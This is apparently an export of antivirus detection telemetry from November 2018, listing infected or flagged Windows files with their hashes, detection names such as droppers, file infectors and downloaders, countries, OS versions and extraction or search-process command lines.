  Row(detection=Row(filename='0eac87397ccf95d2f010a776b7dfdb718fe46b49511251ae348e303310f8915e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0EAC87397CCF95D2F010A776B7DFDB718FE46B49511251AE348E303310F8915E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0eac87397ccf95d2f010a776b7dfdb718fe46b49511251ae348e303310f8915e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:26:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tprecvfs5_01120.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Testing Program 2016 Cloud\\Visor\\Flash\\TPRECVFS5_01120.exe', filesize=428000, name='HEUR/APC.#M1.#R1'), hash='0ec937cc8d5c8a2ec2afc81a80a7914f86c4c17c01b452803cfa811eecfb7061', metadata=Row(cmdline=None, country='SV', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:28:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='repbrows.exe', filepath='H:\\Program Files\\Common Files\\microsoft shared\\Repostry\\REPBROWS.EXE', filesize=512000, name='W32/Infector.Gen.#M300.#R7863'), hash='0f773ff003c6dc4956e290ab6a2ad2333aa840bd4bb2d0b62eeb6dc183870d6e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\malpwt2007\\Malaysia PWT 2018I.exe', parentsize=3497984, timestamp='2018-11-02T03:55:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='G:\\Driver ordenador Pepe\\Acer Aspire 5620 Montañeta\\utilities\\Acer GridVista  2.50.1202\\AcerGrid\\Setup.exe', filesize=512000, name='W32/Sality.Y.#M1.#R1'), hash='0fd106821acb531af2a479227ab7e9e2f18d095df8476b14c89a61efe7dd9fa6', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:44:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0ff58fbe59a5a4d1457dcabed63f554044ce12fa439a3d7e72070800b978ec21', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0FF58FBE59A5A4D1457DCABED63F554044CE12FA439A3D7E72070800B978EC21', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='0ff58fbe59a5a4d1457dcabed63f554044ce12fa439a3d7e72070800b978ec21', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:32:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0ff58fbe59a5a4d1457dcabed63f554044ce12fa439a3d7e72070800b978ec21', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0FF58FBE59A5A4D1457DCABED63F554044CE12FA439A3D7E72070800B978EC21', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='0ff58fbe59a5a4d1457dcabed63f554044ce12fa439a3d7e72070800b978ec21', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:27:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0ff58fbe59a5a4d1457dcabed63f554044ce12fa439a3d7e72070800b978ec21', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0FF58FBE59A5A4D1457DCABED63F554044CE12FA439A3D7E72070800B978EC21', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='0ff58fbe59a5a4d1457dcabed63f554044ce12fa439a3d7e72070800b978ec21', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:55:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000036ed', filepath='C:\\Windows\\Temp\\25248e84-e2bd-4c2b-b714-a7e7fe0e64c0\\tmp000031d1\\tmp000036ed', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='0ff8941a174ace0c00bdd09d6fe8f7be1b34f1cd6a6ae7f8cafaff0451c61465', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.4.942.11595\\AdAwareService.exe', parentsize=542896, timestamp='2018-11-02T10:02:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152430-fc916cb4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4a0cadc4\\AVSCAN-20181102-143721-EEDE8C28\\AVSCAN-20181102-152430-FC916CB4', filesize=109056000, name='HEUR/AGEN.1026193.#M1.#R1'), hash='10038775df000cc4209e21277211009d3669e2e46f1d5577dc875916f958348a', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-175316-e22b05ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_077ac109\\AVSCAN-20181102-175223-DB7E30F6\\AVSCAN-20181102-175316-E22B05EE', filesize=15936000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='104623bb63d89f25f41512ca8546993f36834376c35c7d460d7c9ad9851dc3c6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T16:53:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='1061d0e1699199ae5f33c83ea677e2e346b19665296a6284a082f75c1030e7ef', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:55:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='1061d0e1699199ae5f33c83ea677e2e346b19665296a6284a082f75c1030e7ef', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:54:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='1061d0e1699199ae5f33c83ea677e2e346b19665296a6284a082f75c1030e7ef', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:55:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='--_-___----___----_-_-----____-__--__-_-__--_-.--_-___----___----_-_-----____-__--__-_-__--_-', filepath='h:\\\xa0\\--_-___----___----_-_-----____-__--__-_-__--_-.--_-___----___----_-_-----____-__--__-_-__--_-', filesize=6864000, name='WORM/Lodbak.Gen4.#M300.#R300496'), hash='10ac37e8cf397d75ba149fa5725ccfaf6d01d5a316443e7f049acaa2933c5b81', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~sef6ed.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~seF6ED.tmp', filesize=832000, name='HEUR/AGEN.1025634.#M1.#R1'), hash='10c9afc9bb863ce61bd43523cd17d856beee9958e4d7df3513cad2b48edc477b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:28:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='116be10239f0235823ddf2482c7ae09578a3e13b68c56d7d6a37236c7a4e2687', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-6\\116BE10239F0235823DDF2482C7AE09578A3E13B68C56D7D6A37236C7A4E2687', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='116be10239f0235823ddf2482c7ae09578a3e13b68c56d7d6a37236c7a4e2687', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T06:29:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='116be10239f0235823ddf2482c7ae09578a3e13b68c56d7d6a37236c7a4e2687', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-6\\116BE10239F0235823DDF2482C7AE09578A3E13B68C56D7D6A37236C7A4E2687', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='116be10239f0235823ddf2482c7ae09578a3e13b68c56d7d6a37236c7a4e2687', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:20:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='11a4b7e010799154ddc53e76332c031c22dada19a2803e99942cf60196929396', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\11A4B7E010799154DDC53E76332C031C22DADA19A2803E99942CF60196929396', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='11a4b7e010799154ddc53e76332c031c22dada19a2803e99942cf60196929396', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:48:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='11a4b7e010799154ddc53e76332c031c22dada19a2803e99942cf60196929396', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\11A4B7E010799154DDC53E76332C031C22DADA19A2803E99942CF60196929396', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='11a4b7e010799154ddc53e76332c031c22dada19a2803e99942cf60196929396', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:29:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='winrar-x64-400sc.exe', filepath='F:\\xerox700-pc备份\\win7软件\\winrar-x64-400sc.exe', filesize=128000, name='W32/Stanit.#M1.#R1'), hash='11a8755e357bf42ade043adf4c2000cff979609523b666cf9e557b75df2cb785', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T03:10:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-222507-03fcbb43', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a387ab3\\AVSCAN-20181101-222221-F680730A\\AVSCAN-20181101-222507-03FCBB43', filesize=2176000, name='TR/Dldr.Delphi.Gen.#M1.#R1'), hash='11ba6af1aaa595f2aba234febbe5d09c95052e743025b0d9ad91722fc9511551', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T00:25:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-013226-312780d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1746dec7\\AVSCAN-20181102-012929-1886A83E\\AVSCAN-20181102-013226-312780D2', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='11d0c42bce778cf0330b8ffc16bdc356275f5812f6ee14d1f5137a314c33d50e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:32:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamgeneric001.exe', filepath='\\\\?\\C:\\Windows\\yamgeneric001.exe', filesize=3840000, name='SPR/BitCoin.R.17.#M1.#R1'), hash='123ddc718d5557233de61371644f83948c59c12e897ff58dec883c64e22aaf3b', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:51:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamgeneric001.exe', filepath='\\\\?\\C:\\Windows\\yamgeneric001.exe', filesize=3840000, name='SPR/BitCoin.R.17.#M1.#R1'), hash='123ddc718d5557233de61371644f83948c59c12e897ff58dec883c64e22aaf3b', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:56:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamgeneric001.exe', filepath='\\\\?\\C:\\Windows\\yamgeneric001.exe', filesize=3840000, name='SPR/BitCoin.R.17.#M1.#R1'), hash='123ddc718d5557233de61371644f83948c59c12e897ff58dec883c64e22aaf3b', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:22:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='12650e148f589415f38932f407c0776477440b0eb2ea1dfe9e587d1c51ec0272', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-19\\12650E148F589415F38932F407C0776477440B0EB2EA1DFE9E587D1C51EC0272', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='12650e148f589415f38932f407c0776477440b0eb2ea1dfe9e587d1c51ec0272', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:07:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221844-59c5d141', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5732cab4\\AVSCAN-20181102-220138-CABA3555\\AVSCAN-20181102-221844-59C5D141', filesize=512000, name='Adware/Elex.njjta.#M1.#R1'), hash='1294817883d4f043f82d7762fb29805f6f55a8bab3b804fd15a2cb4a3e415a04', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:18:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='12e35f3749419fec3510cfd26ed2a8fed4d5314b32040284d82d8186b9375420', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\12E35F3749419FEC3510CFD26ED2A8FED4D5314B32040284D82D8186B9375420', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='12e35f3749419fec3510cfd26ed2a8fed4d5314b32040284d82d8186b9375420', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:22:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='washints.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\WASHINTS\\WASHINTS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1320b4bef6bca83e6e5347ff8718e51c7d01b00eb5b2eccf9c2755c0fff930cd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='paths.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\PATHS\\PATHS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1320b4bef6bca83e6e5347ff8718e51c7d01b00eb5b2eccf9c2755c0fff930cd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gta vice city user files.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\GTA Vice City User Files\\GTA Vice City User Files.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1320b4bef6bca83e6e5347ff8718e51c7d01b00eb5b2eccf9c2755c0fff930cd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='washintn.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\WASHINTN\\WASHINTN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1320b4bef6bca83e6e5347ff8718e51c7d01b00eb5b2eccf9c2755c0fff930cd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='stripclb.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\STRIPCLB\\STRIPCLB.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1320b4bef6bca83e6e5347ff8718e51c7d01b00eb5b2eccf9c2755c0fff930cd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='anim.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\ANIM\\ANIM.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1320b4bef6bca83e6e5347ff8718e51c7d01b00eb5b2eccf9c2755c0fff930cd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gta 2010الجديده.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1320b4bef6bca83e6e5347ff8718e51c7d01b00eb5b2eccf9c2755c0fff930cd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='stadint.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\STADINT\\STADINT.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1320b4bef6bca83e6e5347ff8718e51c7d01b00eb5b2eccf9c2755c0fff930cd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='starisl.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\STARISL\\STARISL.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1320b4bef6bca83e6e5347ff8718e51c7d01b00eb5b2eccf9c2755c0fff930cd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:27Z'), dt=datetime.date(2018, 11, 2)),
